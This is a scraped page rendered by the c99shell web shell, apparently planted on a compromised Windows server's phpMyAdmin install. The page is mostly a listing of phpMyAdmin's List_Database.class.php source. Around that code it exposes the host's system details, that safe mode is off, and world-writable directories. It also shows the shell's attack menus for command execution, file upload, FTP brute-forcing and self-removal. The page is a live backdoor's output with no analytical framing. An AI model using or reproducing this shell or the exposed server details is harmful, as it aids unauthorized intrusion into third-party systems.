!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\dmz\phpMyAdmin\libraries\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     List_Database.class.php (4.47 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * holds the PMA_List_Database class
 *
 * @package PhpMyAdmin
 */

if (! defined('PHPMYADMIN')) {
    exit;
}

/**
 * the list base class
 */
require_once './libraries/List.class.php';

/**
 * handles database lists
 *
 * <code>
 * $PMA_List_Database = new PMA_List_Database($userlink);
 * </code>
 *
 * @todo this object should be attached to the PMA_Server object
 *
 * @package PhpMyAdmin
 * @since   phpMyAdmin 2.9.10
 */
class PMA_List_Database extends PMA_List
{
    
/**
     * @var mixed   database link resource|object to be used
     * @access protected
     */
    
protected $db_link null;

    
/**
     * @var mixed   user database link resource|object
     * @access protected
     */
    
protected $db_link_user null;

    
/**
     * @var boolean whether we can retrieve the list of databases
     * @access protected
     */
    
protected $can_retrieve_databases true;

    
/**
     * Constructor
     *
     * @param mixed $db_link_user user database link resource|object
     */
    
public function __construct($db_link_user null)
    {
        
$this->db_link $db_link_user;
        
$this->db_link_user $db_link_user;

        
parent::__construct();
        
$this->build();
    }

    
/**
     * checks if the configuration wants to hide some databases
     *
     * @return void
     */
    
protected function checkHideDatabase()
    {
        if (empty(
$GLOBALS['cfg']['Server']['hide_db'])) {
            return;
        }

        foreach (
$this->getArrayCopy() as $key => $db) {
            if (
preg_match('/' $GLOBALS['cfg']['Server']['hide_db'] . '/'$db)) {
                
$this->offsetUnset($key);
            }
        }
    }

    
/**
     * retrieves database list from server
     *
     * @param string $like_db_name usually a db_name containing wildcards
     *
     * @return array
     */
    
protected function retrieve($like_db_name null)
    {
        if (! 
$this->can_retrieve_databases) {
            return array();
        }

        
$command "SELECT `SCHEMA_NAME` FROM `INFORMATION_SCHEMA`.`SCHEMATA`"
            
" WHERE TRUE";

        if (
null !== $like_db_name) {
            
$command .= " AND `SCHEMA_NAME` LIKE '" $like_db_name "'";
        }

        
$database_list $GLOBALS['dbi']->fetchResult(
            
$commandnullnull$this->db_link
        
);
        
$GLOBALS['dbi']->getError();

        if (
$GLOBALS['errno'] !== 0) {
            
$this->can_retrieve_databases false;
        }

        if (
$GLOBALS['cfg']['NaturalOrder']) {
            
natsort($database_list);
        } else {
            
// need to sort anyway, otherwise information_schema
            // goes at the top
            
sort($database_list);
        }

        return 
$database_list;
    }

    
/**
     * builds up the list
     *
     * @return void
     */
    
public function build()
    {
        if (! 
$this->checkOnlyDatabase()) {
            
$items $this->retrieve();
            
$this->exchangeArray($items);
        }

        
$this->checkHideDatabase();
    }

    
/**
     * checks the only_db configuration
     *
     * @return boolean false if there is no only_db, otherwise true
     */
    
protected function checkOnlyDatabase()
    {
        if (
is_string($GLOBALS['cfg']['Server']['only_db'])
            && 
strlen($GLOBALS['cfg']['Server']['only_db'])
        ) {
            
$GLOBALS['cfg']['Server']['only_db'] = array(
                
$GLOBALS['cfg']['Server']['only_db']
            );
        }

        if (! 
is_array($GLOBALS['cfg']['Server']['only_db'])) {
            return 
false;
        }

        
$items = array();

        foreach (
$GLOBALS['cfg']['Server']['only_db'] as $each_only_db) {

            
// check if the db name contains wildcard,
            // thus containing not escaped _ or %
            
if (! preg_match('/(^|[^\\\\])(_|%)/'$each_only_db)) {
                
// ... not contains wildcard
                
$items[] = PMA_Util::unescapeMysqlWildcards($each_only_db);
                continue;
            }

            if (
$this->can_retrieve_databases) {
                
$items array_merge($items$this->retrieve($each_only_db));
                continue;
            }
        }

        
$this->exchangeArray($items);

        return 
true;
    }

    
/**
     * returns default item
     *
     * @return string default item
     */
    
public function getDefault()
    {
        if (
strlen($GLOBALS['db'])) {
            return 
$GLOBALS['db'];
        }

        return 
$this->getEmpty();
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--